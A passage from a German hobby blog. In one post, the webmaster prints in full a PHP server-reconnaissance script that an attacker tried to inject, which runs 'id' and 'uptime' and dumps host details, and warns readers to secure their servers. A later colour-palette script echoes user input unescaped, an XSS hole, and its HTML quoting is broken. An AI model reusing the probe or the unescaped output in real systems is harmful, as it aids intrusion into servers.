PRoJEcTMuSIcAL – Blog

Die Büros von Google in Zürich können sich sehen lassen. Wie eine Fotostrecke von Chip.de schön verdeutlicht, ist dort noch Platz für Fantasie. Ob das Google’s Geheimnis ist ?

Nadir kurioses bilder, html

Wer – wie ich – viele Emails pro Tag bekommt, geht leicht unter und verliert den Überblick. Farhad Manjoo hat dazu auf den Seite der “New York Times” einen Artikel (in Englisch) veröffentlicht, der vielleicht dabei weiterhilft, Ordnung in das Chaos zu bringen. Ich werde es auf jeden Fall mal ausprobieren

Wie organisierst Du Deine Mails ? Hinterlasse doch einfach Dein System als Kommentar

Nadir Allgemein html, mail

Ich gehöre zu den Webmastern, die regelmäßig die Logfiles analysieren, vor allem im Hinblick auf Spammern und sonstigen Unrat des Webs. Immer wieder mal finde ich da einen Versuch, der mir eine Datei unterschieben soll – wie ich annehme. Meist sind das irgendwelche kryptischen URLs, doch dieses Mal hat mich das schon stutzig gemacht, denn die Domain, war die der Gitarrenjugend Loga.

Ich habe mir die Textdatei mal angesehen, was man mir da denn schönes geben wollte und siehe da, mein Server sollte wohl ausgelesen werden:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

<?
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "0wnW4y<br>";
exit;
?>

URL dazu: http://www.gitarrenjugend-loga.de/news/include/safe1.txt

Für die Datei kann die Gitarrenjugend wahrscheinlich nichts, weil die dort über Hintertürchen gelandet ist – zumindest ist da in den meisten Fällen so.  Aber dennoch könnte es dazu führen, daß eben unbescholtene Bürger als Bösewichte hingestellt werden. Also Leute: Server sichern!

Gute Infos zu diesem Thema gibt es übrigens zum Beispiel hier

Nadir php html, injection, php, Server, software

Da ich gerade dabei bin, das Design für unsere Webseiten neu zu entwerfen, habe ich mir natürlich zuerst eine passende Farbpalette zusammengestellt. Die Farbcodes wurden von mir auch fein säuberlich notiert, nur leider hatte ich vergessen, mir die Farben nebst Codes auch mal auszudrucken, damit ich später weiß, welcher Code, welche Farbe ist. Mist…

Da ich Informatiker bin und mir deswegen die Sachen manchmal leichter machen kann, habe ich mir schnell (waren wirklich nur 5 Minuten) mal ein Script gebastelt, daß mir ganz rudimentär die Farben ausgibt.

So sieht das Ganze dann aus:

Und wer das Script braucht, hier der Code (unkommentiert).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

/***************************
Erstellt: 19-12-2008
Autor: Nadir
Web: www.projectmusical.de
 
Dieses Script zeigt die eingegeben Farben in einer Tabelle an.
Die Farben müssen als HEX-Werte (RGB) in das Textfeld eingetragen werden.
Pro Zeile einen Farbcode
 
****************************/
 
if($_GET["action"] == "show")
{
$temp = explode("\n",$_POST[farben]);
echo "
<table border="0">";
foreach($temp as $farbe)
{
echo "
<tbody>
<tr>
<td width="100" bgcolor="#0fa0be"></td>
<td>$farbe</td>
</tr>
";
}
echo "</tbody></table>
";
}
 
echo "
<hr />
<form action="$_SERVER[PHP_SELF]?action=show" method="post"> <textarea cols="20" rows="20" name="farben">$_POST[farben]</textarea>
<input type="submit" />
</form>
 
";
?&gt;

Fragen bitte in den Kommentaren posten.

Nadir php, webseiten farbcodes, html, php, script